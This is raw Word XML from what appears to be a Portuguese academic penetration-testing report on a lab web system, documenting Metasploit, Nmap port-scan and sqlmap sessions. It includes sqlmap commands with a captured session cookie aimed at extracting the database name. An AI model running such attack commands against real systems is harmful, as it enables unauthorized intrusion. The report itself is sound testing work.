          <w:tab w:val="left" w:pos="-142"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="1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14:paraId="3FE2DA78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CE3F380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entar atacar a porta 135.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50016165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escolhido foi o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auxiliary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scanner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msf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msf_rpc_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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para testar o caso específico da porta RPC escolhida.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a ser executado é o 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máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60024F1C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3A1C2D5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7FBC412A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14:paraId="741CD5A6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113D4901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77265D0A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sistema passou nos testes.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ão foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC32E2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C8D175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1848AD" w14:textId="1464260C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4.3.3.3 Tela de </w:t>
      </w:r>
      <w:proofErr w:type="spell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 – Exploração via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SqlMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02A8E028" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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lastRenderedPageBreak/>
        <w:t>Tarefa realizada no dia 11/04.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AC00B3" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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: 2 horas e 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3A647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92EB4B4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FD73F18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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C7687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, abordada no subcapítulo 3.2, para automatizar o processo de detecção de vulnerabilidades na tela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utilizando injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207BE7CB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C782CEA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1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="395FE280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Verificar se a tela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é vulnerável a injeção de código SQL. Caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w: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E812C02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Para realizar essa sessão de teste, foi necessário utilizar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capturar as informações de cookie contidas no cabeçalho de requisição HTTP no momento em que a página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é acessada. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C820499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09440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="443F10D3" wp14:editId="427535E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>443865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="47720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57" y="21466"/>
                <wp:lineTo x="2155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11(Editada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71A15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B04975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igura 11- Parâmetros obtidos através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01FEDF54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29CA5A7B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Comando utilizado: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FDE6AB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>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="004D4181">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/nome_do_sistema/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink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" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718711A0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>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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>b  --current -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>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC095B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z w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BFC6FD" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py” comando utilizado para executar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SqlMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41DD6F" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-u” utilizado para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8B92C" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia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eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44C29E" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” utilizado para obter o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB2E7F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86384CB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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA4499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que a tela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ão seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42568E27" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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D984FA7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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27347936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. A Figura 12 mostra que após a execução e as inúmeras sessões de testes de injeção o parâmetro informado no comando utilizado não é injetável.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AC14B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4762852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A1FB85" wp14:editId="523AE8EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>100965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1433195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Arredondar Retângulo em um Canto Úni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4287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4FCE2E" id="Arredondar Retângulo em um Canto Único 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:7.95pt;margin-top:-112.85pt;width:307.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" path="m,l3881437,v13152,,23813,10661,23813,23813l3905250,142875,,142875,,xe" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;3881437,0;3905250,23813;3905250,142875;0,142875;0,0" o:connectangles="0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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10464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="390663C7" wp14:editId="452E8C0E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>100965</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="547624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490" y="21499"/>
                <wp:lineTo x="21490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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 12 - Resultado aplicação SQL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via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53F5B5F8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52BF51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14:paraId="45824032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Repetir a ação da Sessão de teste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e aumentar o nível de heurística aplicada pel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a injeção de SQL para o valor máximo: 5. Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E599BA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Comando utilizado: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73474D0F" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="004D4181">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/nomeSistema/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11642626" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -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db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A183048" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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4D4181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--level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D012801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D4181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14:paraId="50686CC7" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“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./sqlmap.py” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121F3E5" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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“-u” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E967DB9" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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“--cookie” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61DA68" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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current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4D4181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” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B048419" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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 “--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>level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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5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” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C9563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00BDCCB" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E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52222BD1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que a tela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ão seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7C320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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53056011" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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. Embora tendo aumentado o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e, por consequência disso, não foi possível descobrir o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C10D69" w14:textId="58F96FC1" w:rsidR="008C6DC7" w:rsidRPr="004D4181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62C4BC4" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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C6350C7" w14:textId="77777777" w:rsidR="00A124EE" w:rsidRPr="004D4181" w:rsidRDefault="00A124EE" w:rsidP="00A12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1ED36F" w14:textId="77777777" w:rsidR="00685A02" w:rsidRPr="004D4181" w:rsidRDefault="00685A02" w:rsidP="00A12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A22DF3" w14:textId="46EFB495" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00417AE8" w:rsidP="00417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>4.3.</w:t>
      </w:r>
      <w:r w:rsidR="00A16205" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EC9C14E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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47B09D0F" w14:textId="2F516A49" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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4.3.4.1 Atividade: Análise do Servidor - Exploração via </w:t>
      </w:r>
      <w:proofErr w:type="spell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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D8635B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arefa realizada dia 12/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6C11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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E93CA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5C8DB9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14:paraId="059C032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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação, relatado na seção ATA 05 do subcapítulo 4.2, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31887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14:paraId="004E32C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2FDB59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A2BFA0E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Varredura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3424ED0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7A5649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varrer as portas 1 a 65.535 do sistema usando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TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F106F7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</w:p>
    <w:p w14:paraId="6490D8B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3D685AD" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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é utilizado para executar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77D3033A" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FCFEA" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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“-p” indica quais as portas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erão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usadas na varredura, o delimitador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464829FC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é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“-”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F8AA0" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6136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53839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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB95D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descobrir as portas abertas, os serviços e a versão dos serviços que essas portas rodam no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0211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631E5E" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16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0790C4E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e acordo com a Figura 13, foi possível descobrir as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DEBA1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16608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="565967CB" wp14:editId="3EEFA8F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-22860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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0A73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igura 13 - Portas TCP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6EBEA34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28BFD1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Serviços encontrados na Figura 13: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A45A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0CE3A9B" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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b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>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao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14:paraId="42AB35BC" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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 xml:space="preserve">Microsoft Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-d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 uma distribuição Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D393694" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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 xml:space="preserve">Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http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Servidor Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF97F7" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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 xml:space="preserve">Microsoft Windows 98 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-ss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ransporte do modelo OSI para permitir a comunicação de aplicativos locais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5D485" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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 xml:space="preserve">Microsoft Firmware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
